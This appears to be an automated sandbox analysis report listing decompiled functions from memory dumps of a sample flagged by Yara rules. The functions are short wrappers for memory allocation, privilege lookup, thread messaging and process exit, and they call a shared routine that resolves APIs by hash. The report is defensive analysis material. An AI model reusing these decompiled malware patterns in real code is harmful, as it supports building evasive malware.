Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00419E80(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t8;
			}

0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea6
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 018499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018499AA

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cda1ff2ba0b3a9df8cf929ab2f7abfd0d100c1f0f878129f264f5ffb1f53f5f5
Instruction ID: 5eb48704f5690e113bf914870412060dacc7d97137ef20d88aabef79bf313d2d
Opcode Fuzzy Hash: cda1ff2ba0b3a9df8cf929ab2f7abfd0d100c1f0f878129f264f5ffb1f53f5f5
Instruction Fuzzy Hash: D59002A134100443D24161994414B060005E7E1341F51C115EA058664DC659CD967166

Uniqueness

Uniqueness Score: -1.00%

Function 01849910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184991A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc0a14c3a47b8cb1d3fed719a1e288d6aa9199c131797ed6b3a743841fcad9e6
Instruction ID: 76a117f195591a89cf11ee1678754c24a418ac0c446f4c5408ec4122863c3e1f
Opcode Fuzzy Hash: fc0a14c3a47b8cb1d3fed719a1e288d6aa9199c131797ed6b3a743841fcad9e6
Instruction Fuzzy Hash: E99002B120100403D281719944047460005E7D0341F51C111AE058664EC6998ED976A5

Uniqueness

Uniqueness Score: -1.00%

Function 018498F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018498FA

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de9bdff9fe8b3c27463f9282e16f22885c41c4e248c0ecb2678ca80a4abea905
Instruction ID: e832f4b12a9d30f52965cb1812f81ff4bd7581613c9bd4fb8758c230d0cb4b22
Opcode Fuzzy Hash: de9bdff9fe8b3c27463f9282e16f22885c41c4e248c0ecb2678ca80a4abea905
Instruction Fuzzy Hash: 3A90026160100503D24271994404616000AE7D0381F91C122AA018665ECA658ED6B171

Uniqueness

Uniqueness Score: -1.00%

Function 01849840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184984A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c60c8306a7d43e9e33119b6d68c78a65afbd59661c5fed5ec834a87c76e87e54
Instruction ID: f223e2ddc8327bf7a1554d8c6111337deb0eada2c8188a5d237b0df11e13b637
Opcode Fuzzy Hash: c60c8306a7d43e9e33119b6d68c78a65afbd59661c5fed5ec834a87c76e87e54
Instruction Fuzzy Hash: 79900261242041535686B19944045074006F7E0381791C112AA408A60CC5669D9AE661

Uniqueness

Uniqueness Score: -1.00%

Function 01849860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184986A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d75762cdbaed06e48913bbae115b62e1d0eb63dee7efe581d62e442c7c001793
Instruction ID: 68edc20608a9cb3269e7b6e8a1aa1232382b53e01596f97c4048e7286a6d7774
Opcode Fuzzy Hash: d75762cdbaed06e48913bbae115b62e1d0eb63dee7efe581d62e442c7c001793
Instruction Fuzzy Hash: 2290027120100413D252619945047070009E7D0381F91C512A9418668DD6968E96B161

Uniqueness

Uniqueness Score: -1.00%

Function 01849A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01849A0A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f674aa956bdf0b7d6395f5cd6bd1eee0ffc9546d72f9f7869a6557073f62e1a
Instruction ID: d95f1902272ff4ece08e4d404773fd209cda36a938b439009ba598142b74a1cb
Opcode Fuzzy Hash: 9f674aa956bdf0b7d6395f5cd6bd1eee0ffc9546d72f9f7869a6557073f62e1a
Instruction Fuzzy Hash: 4D90027120140403D2416199481470B0005E7D0342F51C111AA158665DC6658D9575B1

Uniqueness

Uniqueness Score: -1.00%

Function 01849A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01849A2A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e64d964148156c34c484dd2ae00c9b93e54a83a74d43abc80e55f04545fe0433
Instruction ID: e780eef06031cc05ecc68e0bc4273ec5f2470b4ef99b71e7a21694f5e8a3929b
Opcode Fuzzy Hash: e64d964148156c34c484dd2ae00c9b93e54a83a74d43abc80e55f04545fe0433
Instruction Fuzzy Hash: A390026160100043428171A988449064005FBE1351751C221A998C660DC5998DA966A5

Uniqueness

Uniqueness Score: -1.00%

Function 01849A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01849A5A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a2ca0a51d772faa40d4e117295bf61661894a097ae3368d506b556e8cc841a0
Instruction ID: 559671285e1842ab4ec52b6052a2923068823ebf186f8a22be55bf2921e6812e
Opcode Fuzzy Hash: 2a2ca0a51d772faa40d4e117295bf61661894a097ae3368d506b556e8cc841a0
Instruction Fuzzy Hash: 5E90026121180043D34165A94C14B070005E7D0343F51C215A9148664CC9558DA56561

Uniqueness

Uniqueness Score: -1.00%

Function 018495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018495DA

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55a35779ef38e5cb2bb9e43ef014af1deedcdba34ee03a1b24a2cde0d3d3936b
Instruction ID: 70ff05dd5482b8034070c5535281da457548d418778be2d906f3d9c20e9fb745
Opcode Fuzzy Hash: 55a35779ef38e5cb2bb9e43ef014af1deedcdba34ee03a1b24a2cde0d3d3936b
Instruction Fuzzy Hash: 519002A120200003424671994414616400AE7E0341B51C121EA0086A0DC5658DD57165

Uniqueness

Uniqueness Score: -1.00%

Function 01849540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184954A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd22687dff91d6a93a6bf7a974cbf2ce2073ede1d3e8e1d8dc21fda86d89cb43
Instruction ID: 9d1f7f6db00118196c862a282759b3e5fc8b4b52c76575afd4affaec6ea7ba43
Opcode Fuzzy Hash: fd22687dff91d6a93a6bf7a974cbf2ce2073ede1d3e8e1d8dc21fda86d89cb43
Instruction Fuzzy Hash: 79900265211000030246A59907045070046E7D5391351C121FA009660CD6618DA56161

Uniqueness

Uniqueness Score: -1.00%

Function 01849780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184978A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d215252be231f0d507e79b79e770165e688f439f4ee2998187be2560b8fa1b20
Instruction ID: e41c043716751986f605bc3dd192e9c125a1bf399a39f902adb23347879ab43a
Opcode Fuzzy Hash: d215252be231f0d507e79b79e770165e688f439f4ee2998187be2560b8fa1b20
Instruction Fuzzy Hash: 6F90026921300003D2C17199540860A0005E7D1342F91D515A9009668CC9558DAD6361

Uniqueness

Uniqueness Score: -1.00%

Function 018497A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018497AA

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9f51eb4ad5064c05cb897efd1e00f6107aabef962a8a4efb38d5775eeb07921
Instruction ID: 89706f31df99777af676ddac06d91ce5ed6c5613b182b75319f1564910b1f993
Opcode Fuzzy Hash: e9f51eb4ad5064c05cb897efd1e00f6107aabef962a8a4efb38d5775eeb07921
Instruction Fuzzy Hash: 2990026130100003D281719954186064005F7E1341F51D111E9408664CD9558D9A6262

Uniqueness

Uniqueness Score: -1.00%

Function 01849710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184971A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2df4c77a8718044c3c0bdcfa63ac0d376d4aa102ee5284824fbbac58fac3d548
Instruction ID: ed95f20906cb7ed688f2fb54cb38eda76b090e7931af2e0ee2f064a849df9bbd
Opcode Fuzzy Hash: 2df4c77a8718044c3c0bdcfa63ac0d376d4aa102ee5284824fbbac58fac3d548
Instruction Fuzzy Hash: 8690027120100403D24165D954086460005E7E0341F51D111AE018665EC6A58DD57171

Uniqueness

Uniqueness Score: -1.00%

Function 018496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018496EA

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14135b3c2de2599a6ef3efb7129fe9de4955e1d0f826721d006cb3451de70e9e
Instruction ID: 652b41bf239109063f3962e18a2b7515147681e7f998d5364b55b131c9d54dd8
Opcode Fuzzy Hash: 14135b3c2de2599a6ef3efb7129fe9de4955e1d0f826721d006cb3451de70e9e
Instruction Fuzzy Hash: 4890027120108803D2516199840474A0005E7D0341F55C511AD418768DC6D58DD57161

Uniqueness

Uniqueness Score: -1.00%

Function 01849660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0184966A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d1fa7ddebabbf7d5b02b719c77c4c64c806972a32081cf185abc0e4a2c45ffc
Instruction ID: d128a0e91a8f5522ef7f058b9566e1be3eeff88d392b5be8965dfef3a465a7ab
Opcode Fuzzy Hash: 6d1fa7ddebabbf7d5b02b719c77c4c64c806972a32081cf185abc0e4a2c45ffc
Instruction Fuzzy Hash: C890027120100803D2C17199440464A0005E7D1341F91C115A9019764DCA558F9D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x0041a037
0x0041a03c
0x0041a04d
0x0041a051

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004082E8(void* __edx, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t24;
				int _t29;
				void* _t32;
				void* _t34;
				void* _t39;

				_t39 = __edx + 1;
				asm("int1");
				asm("fist dword [edi]");
				asm("scasd");
				_t32 = _t34;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t39, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t29 = _t13;
				if(_t29 != 0) {
					_t24 = _a8;
					_t13 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t41 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t29(_t24, 0x8003, _t32 + (E0040A450(_t41, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}

0x004082e8
0x004082e9
0x004082ec
0x004082ee
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: efb66262c378e8e180f2599866928d3dc04ef2581891e2d8cecec8661501fea0
Instruction ID: c77ac87102d896b34a865cd7e029b7f546e281deea07ef62585604c82802e598
Opcode Fuzzy Hash: efb66262c378e8e180f2599866928d3dc04ef2581891e2d8cecec8661501fea0
Instruction Fuzzy Hash: 4E01B531A802287BE721A6959C43FFE772CAB40F54F14401EFE04BA2C1D6A9691546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1BB, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041A1BB(void* __ebx, void* __edi, char _a1, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t11;

				_push( &_a1);
				_t8 = _a4;
				E0041A950(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t11;
			}

0x0041a1c0
0x0041a1c3
0x0041a1da
0x0041a1f0
0x0041a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 49dacf1fe7fa3432a90d97d7b98281557f9be6d7f85644732179a28cb4c78b93
Instruction ID: e7effbff9d96b0a2e7b8c6f11db4e248764a9d43f074ae6abd4c21b80e0b55aa
Opcode Fuzzy Hash: 49dacf1fe7fa3432a90d97d7b98281557f9be6d7f85644732179a28cb4c78b93
Instruction Fuzzy Hash: 24E09AB5200204AFDB20DF69EC85EE73BA8AF89250F018569F95CA7241CA31A8508BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1da
0x0041a1f0
0x0041a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A098, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A098() {
				void* _t14;
				void* _t18;
				void* _t19;

				_pop(ds);
				 *0xFFFFFFFF8B55DFCA();
				_t18 = _t19;
				_t7 =  *((intOrPtr*)(_t18 + 8));
				E0041A950(_t14,  *((intOrPtr*)(_t18 + 8)),  *((intOrPtr*)(_t18 + 8)) + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t18 + 0xc));
			}

0x0041a098
0x0041a09c
0x0041a0a1
0x0041a0a3
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1cced6157fc90542b7e5baa0f50a5c1feb2c15edc1265ad65e897f135661aef2
Instruction ID: 939fa0152f32fdc82ce55f0da553632716af100f79022e183650cbec1e94b7ef
Opcode Fuzzy Hash: 1cced6157fc90542b7e5baa0f50a5c1feb2c15edc1265ad65e897f135661aef2
Instruction Fuzzy Hash: 19E0C2752002017FD724DF24CCC9FD77B68EF48350F018468B91CEB341CA31AA00CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0a3
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0184967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01849694

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2a40dfbe7d49e0408a699fa533a984b90d287eb7fd8efc1b427e4038078ac41
Instruction ID: d2802fe270d2e2b13f3640110bafa074a671167fe2a08d592ff0726fb7282e0e
Opcode Fuzzy Hash: f2a40dfbe7d49e0408a699fa533a984b90d287eb7fd8efc1b427e4038078ac41
Instruction Fuzzy Hash: C5B02B71C020C4C7D712D3A006087173900F7C0300F13C011D2024340B4738C1C0F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 018BB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 018BB51C
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 018BB38F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 018BB476
The instruction at %p tried to %s , xrefs: 018BB4B6
write to, xrefs: 018BB4A6
an invalid address, %p, xrefs: 018BB4CF
The critical section is owned by thread %p., xrefs: 018BB3B9
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 018BB53F
Go determine why that thread has not released the critical section., xrefs: 018BB3C5
*** enter .exr %p for the exception record, xrefs: 018BB4F1
*** Resource timeout (%p) in %ws:%s, xrefs: 018BB352
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 018BB484
